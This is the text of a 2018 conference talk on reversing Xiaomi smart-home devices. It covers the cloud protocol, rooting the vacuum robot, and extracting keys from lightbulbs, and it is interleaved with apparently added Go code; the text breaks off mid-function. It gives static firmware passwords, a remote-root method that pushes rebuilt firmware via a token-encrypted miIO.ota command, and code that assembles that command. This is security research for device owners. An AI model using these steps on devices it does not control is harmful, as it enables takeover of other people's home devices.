Reversing IoT: Xiaomi Ecosystem
Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)
ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Outline
• Introduction
• Xiaomi Cloud
• Devices and Rooting
– Vacuum Cleaning Robot
– Smart Home Gateway/Lightbulbs/LED Strip
Why Xiaomi
“Xiaomi’s ‘Mi Ecosystem’ has 50 million connected devices” [1]
“[…] revenue from its smart hardware ecosystem exceeded 15 billion yuan” (1.9 billion €) [2]
Most important: The stuff is cheap
[1] https://techcrunch.com/2017/01/11/xiaomi-2016-to-2017/
[2] https://www.reuters.com/article/us-xiaomi-outlook/chinas-xiaomi-targets-2017-sales-of-14-5-billion-after-2016-overhaul-idUSKBN14W0LZ
Costs
• Vacuum Cleaning Robot Gen1: ~ 260 €
• Vacuum Cleaning Robot Gen2: ~ 400 €
• Smart Home Gateway: ~25 €
• Sensors: ~5-14 €
• WiFi Lightbulbs: ~6-12 €
Xiaomi News
• Oculus Rift cooperation with Facebook
• Xiaomi buys Segway
How we started
May 2017: Mi Band 2, Vacuum Robot Gen 1
June 2017: Smart Home Gateway + Sensors
July 2017: Yeelink Lightbulbs (Color + White), Yeelink LED Strip
October 2017: Yeelink Desklamp, Philips Eyecare Desklamp
December 2017: Yeelink/Philips Ceiling Lights, Philips Smart LED Lightbulb
January 2018: Vacuum Robot Gen 2, Yeelink Bedside Lamp
Why Vacuum Robots?
Source: Xiaomi advertisement
THE XIAOMI CLOUD
Xiaomi Cloud
• Different Vendors, one ecosystem
– Same communication protocol
– Different technologies used
• “Public” guidelines for implementation
– Implementation differs from manufacturer to manufacturer
– https://github.com/MiEcosystem/miio_open
– https://iot.mi.com/index.html
Xiaomi Ecosystem
[Architecture diagram; labels: Xiaomi Cloud, HTTPS, Gateway, ZigBee, WiFi]
Device to Cloud Communication
• DeviceID
– Unique per device
• Keys
– Cloudkey (16 byte alpha-numeric)
• Is used for cloud communication (AES encryption)
• Static, is not changed by update or provisioning
– Token (16 byte alpha-numeric)
• Is used for app communication (AES encryption)
• Dynamic, is generated at provisioning (connecting to new WiFi)
Cloud protocol
• Same payload for UDP and TCP stream
• Encryption key depends on Cloud/App usage
• For unprovisioned devices:
– During discovery: Token in plaintext in the checksum field
Packet layout (byte offsets in hex):
Header    Byte 0,1: Magic 2131 | Byte 2,3: Length | Byte 4,5,6,7: 00 00 00 00 | Byte 8,9,A,B: DID | Byte C,D,E,F: epoch (big endian)
Checksum  Byte 10-1F: md5sum[Header + Key(Cloud)/Token(App) + Data (if exists)]
Data      Byte 20 onwards: Encrypted Data (if exists, e.g. if not Ping/Pong or Hello message)
Payload encryption:
• token = for cloud: key; for app: token
• key = md5sum(token)
• iv = md5sum(key + token)
• cipher = AES(key, AES.MODE_CBC, iv, padded plaintext)
Cloud protocol
• Data
– JSON-formatted messages
– Packet identified by packetid
– Structures:
• commands: "methods" + "params"
• responses: "results"
– Every command/response confirmed by receiver (except otc)
• Example
– {'id': 136163637, 'params': {'ap': {'ssid': 'myWifi', 'bssid': 'F8:1A:67:CC:BB:AA', 'rssi': -30}, 'hw_ver': 'Linux', 'life': 82614, 'model': 'rockrobo.vacuum.v1', 'netif': {'localIp': '192.168.1.205', 'gw': '192.168.1.1', 'mask': '255.255.255.0'}, 'fw_ver': '3.3.9_003077', 'mac': '34:CE:00:AA:BB:DD', 'token': 'xxx'}, 'partner_id': '', 'method': '_otc.info'}
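The packet layout and key derivation from the two cloud-protocol slides above, worked through as an added Go example (not the authors' code and not any Xiaomi or python-miio source): BuildPacket assembles a packet exactly as the slide lays it out, and ParsePacket checks magic, length and the MD5 checksum before it decrypts, so a wrong token or a tampered datagram is rejected; with no token it accepts only the data-less discovery reply whose checksum field carries the plaintext token. The token, DID and epoch are constructed placeholders, and Go is used because its standard library provides MD5 and AES-CBC without extra dependencies.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"crypto/subtle"
	"encoding/binary"
	"errors"
)

const (
	magic, headerLen = 0x2131, 32         // header magic from the slide; 16-byte header + 16-byte MD5 checksum field
	exampleToken     = "0123456789abcdef" // constructed 16-byte token standing in for a device token or cloud key
)

// cbcCipher derives key = md5sum(token) and iv = md5sum(key + token) as on the slide (16-byte key, so AES-128).
func cbcCipher(token []byte, mode func(cipher.Block, []byte) cipher.BlockMode) cipher.BlockMode {
	key := md5.Sum(token)
	iv := md5.Sum(append(key[:], token...))
	block, _ := aes.NewCipher(key[:])
	return mode(block, iv[:])
}

// encryptPayload: cipher = AES(key, AES.MODE_CBC, iv, padded plaintext), with PKCS#7 padding.
func encryptPayload(token, plaintext []byte) []byte {
	n := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	cbcCipher(token, cipher.NewCBCEncrypter).CryptBlocks(padded, padded)
	return padded
}

func decryptPayload(token, ct []byte) ([]byte, error) {
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of AES blocks")
	}
	pt := make([]byte, len(ct))
	cbcCipher(token, cipher.NewCBCDecrypter).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return pt[:len(pt)-n], nil
}

// checksum = md5sum[Header + Key(Cloud)/Token(App) + Data (if exists)].
func checksum(token, pkt []byte) []byte {
	sum := md5.Sum(bytes.Join([][]byte{pkt[:16], token, pkt[headerLen:]}, nil))
	return sum[:]
}

// BuildPacket assembles magic | length | 00000000 | DID | epoch | checksum | data; a nil plaintext gives a data-less packet.
func BuildPacket(token []byte, did, epoch uint32, plaintext []byte) ([]byte, error) {
	var data []byte
	if len(plaintext) > 0 {
		data = encryptPayload(token, plaintext)
	}
	if headerLen+len(data) > 0xFFFF {
		return nil, errors.New("payload too large for the 16-bit length field")
	}
	pkt := make([]byte, headerLen+len(data))
	binary.BigEndian.PutUint16(pkt[0:2], magic)
	binary.BigEndian.PutUint16(pkt[2:4], uint16(len(pkt)))
	binary.BigEndian.PutUint32(pkt[8:12], did) // bytes 4..7 stay 00 00 00 00
	binary.BigEndian.PutUint32(pkt[12:16], epoch)
	copy(pkt[headerLen:], data)
	copy(pkt[16:headerLen], checksum(token, pkt))
	return pkt, nil
}

type Packet struct {
	DID, Epoch uint32
	Payload    []byte // decrypted JSON; nil for a data-less packet
	HelloToken []byte // set only for a discovery reply parsed without a token
}

// ParsePacket checks magic, length and checksum before decrypting anything; with token == nil it accepts only a
// data-less discovery reply of an unprovisioned device, whose checksum field carries the token in plaintext.
func ParsePacket(token, pkt []byte) (*Packet, error) {
	if len(pkt) < headerLen || binary.BigEndian.Uint16(pkt[0:2]) != magic || int(binary.BigEndian.Uint16(pkt[2:4])) != len(pkt) {
		return nil, errors.New("not a well-formed miIO packet")
	}
	p := &Packet{DID: binary.BigEndian.Uint32(pkt[8:12]), Epoch: binary.BigEndian.Uint32(pkt[12:16])}
	if token == nil && len(pkt) == headerLen {
		p.HelloToken = append([]byte{}, pkt[16:headerLen]...)
		return p, nil
	}
	if subtle.ConstantTimeCompare(checksum(token, pkt), pkt[16:headerLen]) != 1 {
		return nil, errors.New("checksum mismatch: wrong token or tampered packet")
	}
	if len(pkt) > headerLen {
		var err error
		if p.Payload, err = decryptPayload(token, pkt[headerLen:]); err != nil {
			return nil, err
		}
	}
	return p, nil
}
```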
App to Cloud communication
• Authentication via OAuth
• Layered encryption
– Outside: HTTPS
– Inside: RC4/AES using a session key
• Separate integrity
• Message format: JSON RPC
App to Cloud communication
• REQ: api.io.mi.com/home/device_list method:POST params:[]
• RES: {"message":"ok","result":{"list":[{"did":"65981234","token":"abc…zzz","name":"Mi PlugMini","localip":"192.168.99.123","mac":"34:CE:00:AA:BB:CC","ssid":"IoT","bssid":"FA:1A:67:CC:DD:EE","model":"chuangmi.plug.m1","longitude":"-71.0872248","latitude":"42.33794500","adminFlag":1,"shareFlag":0,"permitLevel":16,"isOnline":true,"desc":"Power plug on ","rssi":-47}
App to Cloud communication
• "longitude":"-71.0872248","latitude":"42.33794500" (plotted on a map; source: OpenStreetMap)
LET'S TAKE A LOOK AT THE PRODUCTS
Products
Different architectures
• ARM Cortex-A
• ARM Cortex-M
– Marvell 88MW30X (integrated WiFi)
– Mediatek MT7687N (integrated WiFi + BT-LE)
• MIPS
• Xtensa
– ESP8266, ESP32 (integrated WiFi)
Operating Systems
• Ubuntu 14.04
– Vacuum cleaning robots
• Embedded Linux
– IP cameras
• RTOS
– Smart Home products
– Lightbulbs, ceiling lights, light strips
Implementations
                  Vacuum Robot           Smart Home Gateway   Philips Ceiling Light
Manufacturer      Rockrobo               Lumi United          Yeelight
MCU               Allwinner + STM + TI   Marvell (WiFi)       Mediatek (WiFi + BLE)
Firmware Update   Encrypted + HTTPS      Not Encrypted        Not Encrypted + HTTPS (No Cert!)
Debug Interfaces  Protected              Available            Available
Bonus: Chinese device, but unknown communication to Server in Salt Lake City, USA
LET'S GET ACCESS TO THE DEVICES
VACUUM CLEANING ROBOTS
Device Overview
Source: Xiaomi advertisement
Overview sensors
• 2D LIDAR SLAM (5*360°/s)
• Gen1 only: Ultrasonic distance sensor
• multiple IR sensors
• 3-axis Magnetic Sensor
• 3-axis accelerometer
• 3-axis gyroscope
• Bump sensors
Rooting: Challenges
• Hardware-based access
– Micro USB Port ?
– Serial Connection on PCB ?
• Network-based access
– Portscan ?
– Sniff Network traffic ?
Teardown
Frontside layout mainboard
• 512 MB RAM
• R16 SoC
• 4 GB eMMC Flash
• WiFi Module
• STM32 MCU
Backside layout mainboard
[Board photo; labels: R16 UART (115200 baud) Tx/Rx, STM UART (921600 baud), Tx, LIDAR UART]
Frontside layout mainboard (Gen2)
• 512 MB RAM
• R16 SoC
• 4 GB eMMC Flash
• WiFi Module
• STM32 MCU
Rooting
• Usual (possibly destructive) way to retrieve the firmware
Our weapon of choice:
Pin Layout CPU
[Ball-grid pin map of the CPU, rows A–U by columns 1–17; labelled signal groups: MMC (CLK, CMD, D0–D7, Reset), UART0, UART1 (TX/RX), UART2 (RX/TX), TWI1 (SDA/SCL), Recovery, Confirm, Line In L/R, Phone In, Phone Mic1/Mic2, RSB0 (SDA/SCK/RESET), LCD0–LCD9, USB 1 (USB-DM0/USB-DP0), USB 2 (USB-DM1/USB-DP1), USB DRV, DRAM, VCC/VDD, GND, MMC1, MMC2]
Rooting
Initial Idea:
• Shortcut the MMC data lines
• SoC falls back to FEL mode
• Load + Execute tool in RAM
– Via USB connector
– Dump MMC flash
– Modify image
– Rewrite image to flash
Software
• Ubuntu 14.04.3 LTS (Kernel 3.4.xxx)
– Mostly untouched, patched on a regular basis
• Player 3.10-svn
– Open-Source Cross-platform robot device interface & server
• Proprietary software (/opt/rockrobo)
– AppProxy
– RoboController
– Miio_Client
– Custom adbd-version
• iptables firewall enabled
– Blocks Port 22 (SSHd) + Port 6665 (player)
Available data on device
• Data
– Logfiles (syslogs, duration, area,ssid, passwd)
– "/usr/sbin/tcpdump -i any -s 0 -c 2000 -w"
– Maps
– Multiple MBytes/day
• Data is uploaded to cloud
• Factory reset
– Restores recovery to system
– Does not delete data
• Maps, Logs still exist
Available data on device
• Maps
– Created by player
– 1024px * 1024px
– 1px = 5cm
Available data on device
Northeastern University, ISEC Building, 6th floor
Robot internals
Communication relations (diagram)
• Miio_client: 0.0.0.0:54321 (udp), (local):54322 (tcp)
• player: 0.0.0.0:6665
• RoboController, AppProxy, wifimgr
• uart_mcu, uart_lds, compass
• IPC: plain json (tcp)
• Cloud: ot.io.mi.com:80 (tcp), ott.io.mi.com:8053 (udp); enc(key) json (tcp/udp), AES encrypted; <- commands, reports ->
• Android/iPhone App: enc(token) json (udp)
• *.fds.api.xiaomi.com (https): maps, logs ->; <- sound packages, firmware
eMMC Layout
Label       Content                                        Size in MByte
boot-res    bitmaps & some wav files                       8
env         uboot cmd line                                 16
app         device.conf (DID, key, MAC), adb.conf, vinda   16
recovery    fallback copy of OS                            512
system_a    copy of OS (active by default)                 512
system_b    copy of OS (passive by default)                512
Download    temporary unpacked OS update                   528
reserve     config + calibration files, blackbox.db        16
UDISK/Data  logs, maps, pcap files                         ~1900
Update process
![Page 53: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/53.jpg)
53ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
miIO.ota {"mode":"normal“, "install":"1", "app_url":"https://[URL]/v11_[version].pkg", "file_md5":“[md5]",”proc":"dnld install“}
![Page 54: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/54.jpg)
54ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
![Page 55: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/55.jpg)
55ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
2. Download [app_url]
system_a
system_b
Download
Data
Activecopy
![Page 56: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/56.jpg)
56ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
2. Download [app_url]
system_a
system_b
Download
Data
Activecopy
![Page 57: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/57.jpg)
57ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Activecopy
![Page 58: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/58.jpg)
58ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
MD5 ok?
Activecopy
![Page 59: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/59.jpg)
59ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Decrypt + image OK?
Activecopy
![Page 60: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/60.jpg)
60ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Update process (diagram, slides 60–66): the robot has two system partitions, system_a and system_b, one of which is the active copy. The downloaded package lands in the data partition, is unpacked and written with dd to the inactive system copy, the root password in /etc/shadow is updated, and the robot reboots into the freshly written copy. After the reboot the other copy is brought up to date with dd as well.
Firmware updates
• Full and partial images
  – Encrypted tar.gz archives
  – Full image contains disk.img, a 512 MByte ext4 filesystem
• Encryption
  – Static password: "rockrobo"
  – ccrypt (Rijndael with a 256-bit key and a 256-bit block; this is not the 128-bit-block AES, so standard AES tools will not open the archive directly)
• Integrity
  – MD5 provided by cloud (a checksum, not a signature: it arrives over the same channel as the file, so whoever serves the file can serve a matching hash)
• Sound packages
  – Static password: "r0ckrobo#23456"
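To make the "MD5 provided by cloud" point concrete, here is an added Go example of mine (the vacuum's real update code is not on the slides). The two-slot layout follows the update-process diagram above, the MD5 policy is the check the slide describes, and the ed25519 signature policy is my illustration of what a signed update would check instead. All packages, manifests and keys are constructed inside the program.

```go
package main

import (
	"crypto/ed25519"
	"crypto/md5"
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
)

// Two system partitions as on the vacuum: the update is written to the
// inactive one and the active pointer flips only after the check passed.
type device struct {
	slots  [2][]byte
	active int
}

// manifest is what the cloud (or whoever answers as the cloud) hands out next
// to the download URL. The ed25519 signature is an addition for comparison;
// the real device only gets the MD5.
type manifest struct {
	MD5 string // hex, as on the slide
	Sig []byte
}

// checkMD5 is the check the slide describes. It catches a corrupted download,
// nothing more: the hash travels with the file, so an attacker who can serve
// the file (DNS, /etc/hosts, a rogue cloud) can serve a matching hash.
func checkMD5(pkg []byte, m manifest) error {
	if md5hex(pkg) != m.MD5 {
		return errors.New("md5 mismatch")
	}
	return nil
}

// checkSignature is what a signed update would look like: the vendor's public
// key is part of the firmware, so a substituted package fails no matter which
// server delivered it.
func checkSignature(pkg []byte, m manifest, vendorPub ed25519.PublicKey) error {
	if !ed25519.Verify(vendorPub, pkg, m.Sig) {
		return errors.New("signature does not verify")
	}
	return nil
}

// install runs the policy, writes the inactive slot (the dd step) and flips.
func (d *device) install(pkg []byte, check func([]byte) error) error {
	if err := check(pkg); err != nil {
		return err
	}
	inactive := 1 - d.active
	d.slots[inactive] = append([]byte(nil), pkg...)
	d.active = inactive
	return nil
}

func md5hex(b []byte) string { s := md5.Sum(b); return hex.EncodeToString(s[:]) }

// scenario publishes a genuine and an attacker-substituted package and reports
// which policy accepts which: (md5AcceptsRogue, sigAcceptsRogue, sigAcceptsGenuine).
func scenario() (bool, bool, bool) {
	vendorPub, vendorPriv, _ := ed25519.GenerateKey(rand.Reader)
	genuine := []byte("constructed genuine disk.img")
	rogue := []byte("constructed image with authorized_keys added")
	// Both manifests are self-consistent: the attacker recomputes the MD5 and
	// replays a signature taken from a genuine release (they cannot make a valid one).
	gm := manifest{MD5: md5hex(genuine), Sig: ed25519.Sign(vendorPriv, genuine)}
	rm := manifest{MD5: md5hex(rogue), Sig: ed25519.Sign(vendorPriv, genuine)}

	a := &device{}
	md5Rogue := a.install(rogue, func(p []byte) error { return checkMD5(p, rm) }) == nil
	b := &device{}
	sigRogue := b.install(rogue, func(p []byte) error { return checkSignature(p, rm, vendorPub) }) == nil
	sigGenuine := b.install(genuine, func(p []byte) error { return checkSignature(p, gm, vendorPub) }) == nil
	return md5Rogue, sigRogue, sigGenuine
}

func main() {
	r, s, g := scenario()
	fmt.Printf("md5 policy accepts rogue image: %v\n", r)
	fmt.Printf("signature policy accepts rogue image: %v, genuine image: %v\n", s, g)
}
```

The attacker's package passes the MD5 policy because the attacker writes both the file and the manifest; the static ccrypt password does not change that, since it is the same on every robot. The remote rooting on the next slides is exactly this scenario with us as the attacker.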
Let's root remotely
• Preparation: rebuild the firmware
  – Include our authorized_keys
  – Remove the iptables rule that blocks sshd
• Send the "miIO.ota" command to the vacuum
  – Encrypted with the device token
  – From the app, or from the unprovisioned state, where "Get Token" yields the token without the app
  – Pointing to our own HTTP server
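An added Go example of mine showing what "encrypted with the token" means on the wire for the miIO.ota command above. The packet format, key derivation and hello/token behaviour are taken from the public miIO protocol documentation that python-miio is built on (the slides do not spell them out), and the miIO.ota parameter names are the ones python-miio sends; the token, device id, stamp, URL and firmware bytes are constructed placeholders. Nothing here touches the network: it builds the packet and parses it back the way the device would.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"encoding/binary"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// miIO packet (from the public protocol write-ups behind python-miio, not the slides).
// Header, big-endian: 0x2131 | u16 length | u32 0 | u32 device id | u32 stamp | 16-byte MD5,
// then the AES-128-CBC/PKCS#7 encrypted JSON with key = MD5(token), iv = MD5(key || token).
// checksum = MD5(header with the token in the checksum slot || ciphertext).
const headerLen = 32

func newCBC(token []byte, encrypt bool) cipher.BlockMode {
	key := md5.Sum(token)
	iv := md5.Sum(append(key[:], token...))
	block, _ := aes.NewCipher(key[:]) // 16-byte key: cannot fail
	if encrypt {
		return cipher.NewCBCEncrypter(block, iv[:])
	}
	return cipher.NewCBCDecrypter(block, iv[:])
}

func decryptPayload(token, ct []byte) ([]byte, error) {
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not block aligned")
	}
	out := append([]byte(nil), ct...)
	newCBC(token, false).CryptBlocks(out, out)
	pad := int(out[len(out)-1])
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(out[len(out)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, errors.New("bad padding (wrong token?)")
	}
	return out[:len(out)-pad], nil
}

// buildPacket wraps a JSON command; deviceID and stamp are echoed from the hello reply.
func buildPacket(token []byte, deviceID, stamp uint32, payload []byte) []byte {
	pad := aes.BlockSize - len(payload)%aes.BlockSize
	ct := append(append([]byte(nil), payload...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	newCBC(token, true).CryptBlocks(ct, ct)
	pkt := make([]byte, headerLen+len(ct))
	binary.BigEndian.PutUint16(pkt[0:], 0x2131)
	binary.BigEndian.PutUint16(pkt[2:], uint16(len(pkt)))
	binary.BigEndian.PutUint32(pkt[8:], deviceID)
	binary.BigEndian.PutUint32(pkt[12:], stamp)
	copy(pkt[16:], token) // the token sits in the checksum slot while hashing
	copy(pkt[headerLen:], ct)
	sum := md5.Sum(pkt)
	copy(pkt[16:], sum[:])
	return pkt
}

// parsePacket is the receiving side: only a token holder can produce the checksum,
// so a wrong token or a tampered byte is rejected before anything is decrypted.
func parsePacket(token, pkt []byte) ([]byte, error) {
	if len(pkt) < headerLen || binary.BigEndian.Uint16(pkt) != 0x2131 ||
		int(binary.BigEndian.Uint16(pkt[2:])) != len(pkt) {
		return nil, errors.New("not a well-formed miIO packet")
	}
	tmp := append([]byte(nil), pkt...)
	copy(tmp[16:], token)
	if sum := md5.Sum(tmp); !bytes.Equal(sum[:], pkt[16:32]) {
		return nil, errors.New("checksum mismatch: wrong token or tampered packet")
	}
	return decryptPayload(token, pkt[headerLen:])
}

// helloPacket is the discovery probe (header, all other fields 0xff). An unprovisioned
// device answers with its id, stamp and its token in bytes 16..31: the "Get Token" step.
func helloPacket() []byte {
	h := bytes.Repeat([]byte{0xff}, headerLen)
	binary.BigEndian.PutUint16(h, 0x2131)
	binary.BigEndian.PutUint16(h[2:], headerLen)
	return h
}

// otaCommand uses the parameter names python-miio sends for miIO.ota.
func otaCommand(id int, url, fileMD5 string) []byte {
	b, _ := json.Marshal(map[string]interface{}{"id": id, "method": "miIO.ota",
		"params": map[string]string{"mode": "normal", "install": "1",
			"app_url": url, "file_md5": fileMD5, "proc": "dnld install"}})
	return b
}

func main() {
	token, _ := hex.DecodeString("00112233445566778899aabbccddeeff") // constructed token
	img := md5.Sum([]byte("constructed firmware image"))            // stands in for the rebuilt disk.img
	pkt := buildPacket(token, 0x0a0b0c0d, 1000, otaCommand(1, "http://192.0.2.10/firmware.pkg", hex.EncodeToString(img[:])))
	plain, err := parsePacket(token, pkt)
	fmt.Printf("%d bytes on the wire -> %s (err=%v)\n", len(pkt), plain, err)
}
```

The checksum doubles as the authenticator: without the token neither a valid checksum nor a readable payload can be produced. That is why the unprovisioned state matters so much: the hello reply hands the token to whoever asks first, turning "the owner can push firmware" into "anyone on the same network can push firmware", which is the warning on the last slide.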
Diagram (slides 71–76): the vacuum in its unprovisioned state and a laptop running a webserver that hosts the rebuilt firmware. Step 1, "Get Token": the laptop obtains the device token. Step 2, "miIO.ota": the laptop sends the token-encrypted OTA command pointing at its webserver, and the vacuum downloads and installs the image from there.
SSH (screenshots, slides 77–82)
Gain Independence
Two methods:
• Replacing the cloud interface
• Proxy cloud communication
Replacing the cloud interface (diagram, slides 84–87)
Robot internals: player (0.0.0.0:6665), RoboController, AppProxy, wifimgr, uart_mcu, uart_lds and compass exchange commands and reports over IPC. Transport legend: plain JSON (tcp) between the internal components, enc(key) JSON (tcp/udp) between miio_client and the cloud, enc(token) JSON (udp) between miio_client and the app.
Stock setup: miio_client listens on 0.0.0.0:54321 (udp) for the Android/iPhone app and on (local):54322 (tcp) for the internal components; it talks to ot.io.mi.com:80 (tcp) and ott.io.mi.com:8053 (udp), and file downloads come from *.fds.api.xiaomi.com (https).
Replacement: miio_client is swapped for "my cloud client", which keeps the (local):54322 (tcp) side towards the robot internals and exposes https, mqtt, etc. to FHEM or Home Assistant. The cloud hostnames are neutralised in /etc/hosts:
127.0.0.1 awsbj0...
127.0.0.1 aswbj0-files…
127.0.0.1 cdn.cnbj0….
Proxy cloud communication (diagram, slides 88–90)
The robot keeps its stock miio_client (0.0.0.0:54321 udp for the app, (local):54322 tcp for the internals) and the Android/iPhone app keeps its enc(token) JSON (udp) link; only the cloud endpoints ot.io.mi.com:80 (tcp) and ott.io.mi.com:8053 (udp) are redirected. An /etc/hosts entry on the robot points them at our own server (130.83.x.x ot.io.mi.com) running Dustcloud, which stands in for the cloud on the enc(key) JSON (tcp/udp) side and can forward traffic onwards. File downloads from *.fds.api.xiaomi.com (https) are unchanged.
Summary of the Vacuum
• Rooting
  – Remote!
• Cloud connection
  – Run without cloud
  – Run with your own cloud
• Our goal: we want the cloud keys!
SMART HOME GATEWAY, LIGHTBULBS AND LED STRIPS
Xiaomi Ecosystem (diagram, slides 93–94): ZigBee sensors ↔ Gateway ↔ HTTPS ↔ Xiaomi Cloud
Overview Hardware
• Application MCU: Marvell 88MW30x
  – ARM Cortex-M4F @ 200 MHz
  – RAM: 512 KByte SRAM
  – QSPI interface, supports XIP (code executes in place from flash)
  – Flash: 16 MByte (Gateway), 4 MByte SPI (LED strip, lightbulb)
  – Integrated 802.11b/g/n WiFi core
• Zigbee MCU: NXP JN5169 (Gateway only)
  – 32-bit RISC CPU
  – RAM: 32 kB
  – Flash: 512 kB embedded flash, 4 kB EEPROM
Sensors connected via gateway
Zigbee (NXP JN5169) based:
• Door sensor (reed contact)
• Temperature sensor
• Power plug
• Motion sensor
• Button
• Smoke detector
• Smart door lock
• …
Acquiring the Key
• The PCB has lots of test points
• SWD is enabled by default
• Pads labelled on the board photo: SDCLK, SDIO (SWD), RST, GND, TX, RX (UART)
• We can get the key from the memory dump
Acquiring the Key
• Can we get the key without a hardware attack?
• Firmware updates are not signed…
• No hardware access needed: let's create a modified firmware which gives us the key automatically!
• The lightbulb runs a bare-metal OS => we need to patch the binary
Binary Patching: Goals
• Modify program flow
• Add additional code
• Use existing functions
(diagram, slides 103–107: a branch inside the original code, which originally led to more original code, is redirected to the patch code)
Binary Patching: Why can it be hard?
• Overwriting branch instructions: on ARM the encoded field is an offset, new address = value of PC + offset, so a branch is only correct for the exact address it sits at and must be re-encoded whenever it is moved or retargeted
• Writing the new code in assembly
• Modelling the address space (RAM / ROM / free space)
• Calling existing functions
• Handling different firmware versions and devices
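The PC-relative encoding in the first bullet is the part that goes wrong when done by hand, so here is that calculation as code: an added Go example of mine, not from the slides or from the Nexmon project. It encodes and decodes the 32-bit Thumb-2 B.W and BL forms (the ones relevant on the Cortex-M4F in these devices; 16-bit branches and conditional B.W are not handled) and writes a hook into a constructed memory image whose base address is made up for the demonstration.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// Thumb-2 32-bit branch encodings on ARMv7-M (the Cortex-M4F in the 88MW30x):
//   B.W (T4): 11110 S imm10 | 10 J1 1 J2 imm11
//   BL  (T1): 11110 S imm10 | 11 J1 1 J2 imm11
// offset = SignExtend(S:I1:I2:imm10:imm11:0) with I1 = NOT(J1 XOR S), I2 = NOT(J2 XOR S),
// and the target is PC + offset, where PC is the address of the branch plus 4.

func encodeBranch(at, target uint32, link bool) ([]byte, error) {
	if at&1 != 0 || target&1 != 0 {
		return nil, errors.New("branch and target must be halfword aligned")
	}
	off := int64(target) - int64(at) - 4
	if off < -(1<<24) || off >= 1<<24 {
		return nil, fmt.Errorf("0x%x is out of range from 0x%x (limit is 16 MiB either way)", target, at)
	}
	imm := uint32(off) // two's complement; only bits 24..1 are encoded
	s := (imm >> 24) & 1
	i1, i2 := (imm>>23)&1, (imm>>22)&1
	j1, j2 := (^(i1 ^ s))&1, (^(i2 ^ s))&1
	hw1 := uint16(0xf000 | s<<10 | (imm>>12)&0x3ff)
	hw2 := uint16(0x9000 | j1<<13 | j2<<11 | (imm>>1)&0x7ff)
	if link {
		hw2 |= 0x4000 // BL differs from B.W only in bit 14 of the second halfword
	}
	insn := make([]byte, 4)
	binary.LittleEndian.PutUint16(insn[0:], hw1)
	binary.LittleEndian.PutUint16(insn[2:], hw2)
	return insn, nil
}

func decodeBranch(at uint32, insn []byte) (target uint32, link bool, err error) {
	if len(insn) < 4 {
		return 0, false, errors.New("need 4 bytes")
	}
	hw1 := uint32(binary.LittleEndian.Uint16(insn[0:]))
	hw2 := uint32(binary.LittleEndian.Uint16(insn[2:]))
	if hw1&0xf800 != 0xf000 || hw2&0x9000 != 0x9000 {
		return 0, false, errors.New("not a B.W/BL encoding")
	}
	s := (hw1 >> 10) & 1
	j1, j2 := (hw2>>13)&1, (hw2>>11)&1
	i1, i2 := (^(j1 ^ s))&1, (^(j2 ^ s))&1
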